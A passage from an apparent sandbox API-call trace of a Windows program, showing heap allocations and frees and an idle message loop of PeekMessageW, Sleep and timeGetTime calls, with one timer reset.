hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d720 | out: hHeap=0x25c0000) returned 1 [0142.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0142.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0142.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f28 | out: hHeap=0x25c0000) returned 1 [0142.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9150 | out: hHeap=0x25c0000) returned 1 [0142.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0142.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0142.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9090 | out: hHeap=0x25c0000) returned 1 [0142.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d60 | out: hHeap=0x25c0000) returned 1 [0142.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0142.683] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0142.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0142.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0142.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0142.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9090 [0142.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9150 [0142.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1058 [0142.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f28 [0142.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0142.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f28 | out: hHeap=0x25c0000) returned 1 [0142.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9150 | out: hHeap=0x25c0000) returned 1 [0142.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9090 | out: hHeap=0x25c0000) returned 1 [0142.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0142.684] timeGetTime () returned 0x2eed0 [0142.684] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.684] Sleep (dwMilliseconds=0xa) [0142.694] timeGetTime () returned 0x2eee0 [0142.694] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.694] Sleep (dwMilliseconds=0xa) [0142.709] timeGetTime () returned 0x2eeef [0142.709] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.709] Sleep (dwMilliseconds=0xa) [0142.725] timeGetTime () returned 0x2eeff [0142.725] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.725] Sleep (dwMilliseconds=0xa) [0142.740] timeGetTime () returned 0x2ef0f [0142.740] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.740] Sleep (dwMilliseconds=0xa) [0142.756] timeGetTime () returned 0x2ef1e [0142.756] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.756] Sleep (dwMilliseconds=0xa) [0142.772] timeGetTime () returned 0x2ef2e [0142.772] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.772] Sleep (dwMilliseconds=0xa) [0142.787] timeGetTime () returned 0x2ef3d [0142.787] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.787] Sleep (dwMilliseconds=0xa) [0142.804] timeGetTime () returned 0x2ef4d [0142.804] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.804] Sleep (dwMilliseconds=0xa) [0142.818] timeGetTime () returned 0x2ef5d [0142.818] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.818] Sleep (dwMilliseconds=0xa) [0142.834] timeGetTime () returned 0x2ef6c [0142.834] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.834] Sleep (dwMilliseconds=0xa) [0142.849] timeGetTime () returned 0x2ef7c [0142.850] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.850] Sleep (dwMilliseconds=0xa) [0142.865] timeGetTime () returned 0x2ef8b [0142.865] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.865] Sleep (dwMilliseconds=0xa) [0142.881] timeGetTime () returned 0x2ef9b [0142.881] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.881] Sleep (dwMilliseconds=0xa) [0142.896] timeGetTime () returned 0x2efab [0142.897] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.897] Sleep (dwMilliseconds=0xa) [0142.912] timeGetTime () returned 0x2efba [0142.912] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.912] Sleep (dwMilliseconds=0xa) [0142.927] timeGetTime () returned 0x2efca [0142.927] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.928] Sleep (dwMilliseconds=0xa) [0142.943] timeGetTime () returned 0x2efd9 [0142.943] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.943] Sleep (dwMilliseconds=0xa) [0142.959] timeGetTime () returned 0x2efe9 [0142.959] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.959] Sleep (dwMilliseconds=0xa) [0142.974] timeGetTime () returned 0x2eff9 [0142.974] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.974] Sleep (dwMilliseconds=0xa) [0142.990] timeGetTime () returned 0x2f008 [0142.990] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0142.990] Sleep (dwMilliseconds=0xa) [0143.006] timeGetTime () returned 0x2f018 [0143.006] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.006] Sleep (dwMilliseconds=0xa) [0143.021] timeGetTime () returned 0x2f027 [0143.021] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.021] Sleep (dwMilliseconds=0xa) [0143.037] timeGetTime () returned 0x2f037 [0143.037] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.037] Sleep (dwMilliseconds=0xa) [0143.053] timeGetTime () returned 0x2f047 [0143.054] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.054] Sleep (dwMilliseconds=0xa) [0143.068] timeGetTime () returned 0x2f056 [0143.068] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.068] Sleep (dwMilliseconds=0xa) [0143.083] timeGetTime () returned 0x2f066 [0143.084] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.084] Sleep (dwMilliseconds=0xa) [0143.099] timeGetTime () returned 0x2f075 [0143.099] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.099] Sleep (dwMilliseconds=0xa) [0143.115] timeGetTime () returned 0x2f085 [0143.115] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.115] Sleep (dwMilliseconds=0xa) [0143.130] timeGetTime () returned 0x2f095 [0143.130] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.130] Sleep (dwMilliseconds=0xa) [0143.146] timeGetTime () returned 0x2f0a4 [0143.146] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.146] Sleep (dwMilliseconds=0xa) [0143.162] timeGetTime () returned 0x2f0b4 [0143.162] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.162] Sleep (dwMilliseconds=0xa) [0143.177] timeGetTime () returned 0x2f0c3 [0143.177] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.177] Sleep (dwMilliseconds=0xa) [0143.193] timeGetTime () returned 0x2f0d3 [0143.193] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.193] Sleep (dwMilliseconds=0xa) [0143.209] timeGetTime () returned 0x2f0e3 [0143.209] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.209] Sleep (dwMilliseconds=0xa) [0143.224] timeGetTime () returned 0x2f0f2 [0143.224] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.224] Sleep (dwMilliseconds=0xa) [0143.239] timeGetTime () returned 0x2f102 [0143.240] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.240] Sleep (dwMilliseconds=0xa) [0143.255] timeGetTime () returned 0x2f111 [0143.255] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.255] Sleep (dwMilliseconds=0xa) [0143.271] timeGetTime () returned 0x2f121 [0143.271] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.271] Sleep (dwMilliseconds=0xa) [0143.286] timeGetTime () returned 0x2f131 [0143.286] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.287] Sleep (dwMilliseconds=0xa) [0143.310] timeGetTime () returned 0x2f140 [0143.310] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.310] Sleep (dwMilliseconds=0xa) [0143.318] timeGetTime () returned 0x2f150 [0143.318] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.318] Sleep (dwMilliseconds=0xa) [0143.334] timeGetTime () returned 0x2f15f [0143.334] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.334] Sleep (dwMilliseconds=0xa) [0143.349] timeGetTime () returned 0x2f16f [0143.349] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.349] Sleep (dwMilliseconds=0xa) [0143.365] timeGetTime () returned 0x2f17f [0143.365] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.366] Sleep (dwMilliseconds=0xa) [0143.380] timeGetTime () returned 0x2f18e [0143.380] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.380] Sleep (dwMilliseconds=0xa) [0143.396] timeGetTime () returned 0x2f19e [0143.396] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.396] Sleep (dwMilliseconds=0xa) [0143.411] timeGetTime () returned 0x2f1ad [0143.411] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0143.411] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0143.411] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0143.411] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0143.411] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0143.412] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.412] Sleep (dwMilliseconds=0xa) [0143.427] timeGetTime () returned 0x2f1bd [0143.427] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.427] Sleep (dwMilliseconds=0xa) [0143.444] timeGetTime () returned 0x2f1cd [0143.445] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.445] Sleep (dwMilliseconds=0xa) [0143.458] timeGetTime () returned 0x2f1dc [0143.458] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.458] Sleep (dwMilliseconds=0xa) [0143.480] timeGetTime () returned 0x2f1ec [0143.480] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.480] Sleep (dwMilliseconds=0xa) [0143.504] timeGetTime () returned 0x2f1fb [0143.504] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.504] Sleep (dwMilliseconds=0xa) [0143.505] timeGetTime () returned 0x2f20b [0143.505] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.505] Sleep (dwMilliseconds=0xa) [0143.520] timeGetTime () returned 0x2f21b [0143.520] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.520] Sleep (dwMilliseconds=0xa) [0143.536] timeGetTime () returned 0x2f22a [0143.536] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.536] Sleep (dwMilliseconds=0xa) [0143.552] timeGetTime () returned 0x2f23a [0143.552] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.552] Sleep (dwMilliseconds=0xa) [0143.567] timeGetTime () returned 0x2f249 [0143.567] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.567] Sleep (dwMilliseconds=0xa) [0143.583] timeGetTime () returned 0x2f259 [0143.583] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.583] Sleep (dwMilliseconds=0xa) [0143.598] timeGetTime () returned 0x2f269 [0143.599] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.599] Sleep (dwMilliseconds=0xa) [0143.614] timeGetTime () returned 0x2f278 [0143.614] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.614] Sleep (dwMilliseconds=0xa) [0143.629] timeGetTime () returned 0x2f288 [0143.630] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.630] Sleep (dwMilliseconds=0xa) [0143.645] timeGetTime () returned 0x2f297 [0143.645] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.645] Sleep (dwMilliseconds=0xa) [0143.661] timeGetTime () returned 0x2f2a7 [0143.661] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.661] Sleep (dwMilliseconds=0xa) [0143.677] timeGetTime () returned 0x2f2b7 [0143.677] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.677] Sleep (dwMilliseconds=0xa) [0143.694] timeGetTime () returned 0x2f2c6 [0143.694] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.694] Sleep (dwMilliseconds=0xa) [0143.712] timeGetTime () returned 0x2f2d6 [0143.712] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.712] Sleep (dwMilliseconds=0xa) [0143.723] timeGetTime () returned 0x2f2e5 [0143.723] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.723] Sleep (dwMilliseconds=0xa) [0143.739] timeGetTime () returned 0x2f2f5 [0143.739] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.739] Sleep (dwMilliseconds=0xa) [0143.754] timeGetTime () returned 0x2f305 [0143.755] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.755] Sleep (dwMilliseconds=0xa) [0143.771] timeGetTime () returned 0x2f314 [0143.771] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.772] Sleep (dwMilliseconds=0xa) [0143.786] timeGetTime () returned 0x2f324 [0143.786] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.786] Sleep (dwMilliseconds=0xa) [0143.801] timeGetTime () returned 0x2f333 [0143.801] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.801] Sleep (dwMilliseconds=0xa) [0143.817] timeGetTime () returned 0x2f343 [0143.817] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.817] Sleep (dwMilliseconds=0xa) [0143.832] timeGetTime () returned 0x2f353 [0143.832] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.832] Sleep (dwMilliseconds=0xa) [0143.848] timeGetTime () returned 0x2f362 [0143.848] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.848] Sleep (dwMilliseconds=0xa) [0143.864] timeGetTime () returned 0x2f372 [0143.864] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.864] Sleep (dwMilliseconds=0xa) [0143.879] timeGetTime () returned 0x2f381 [0143.879] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.879] Sleep (dwMilliseconds=0xa) [0143.895] timeGetTime () returned 0x2f391 [0143.895] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.895] Sleep (dwMilliseconds=0xa) [0143.910] timeGetTime () returned 0x2f3a1 [0143.910] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.910] Sleep (dwMilliseconds=0xa) [0143.926] timeGetTime () returned 0x2f3b0 [0143.926] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.926] Sleep (dwMilliseconds=0xa) [0143.941] timeGetTime () returned 0x2f3c0 [0143.942] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.942] Sleep (dwMilliseconds=0xa) [0143.957] timeGetTime () returned 0x2f3cf [0143.957] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.957] Sleep (dwMilliseconds=0xa) [0143.973] timeGetTime () returned 0x2f3df [0143.973] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.973] Sleep (dwMilliseconds=0xa) [0143.988] timeGetTime () returned 0x2f3ef [0143.989] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0143.989] Sleep (dwMilliseconds=0xa) [0144.004] timeGetTime () returned 0x2f3fe [0144.004] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.004] Sleep (dwMilliseconds=0xa) [0144.019] timeGetTime () returned 0x2f40e [0144.020] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0144.020] Sleep (dwMilliseconds=0xa) [0144.035] timeGetTime () returned 0x2f41d [0144.035] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 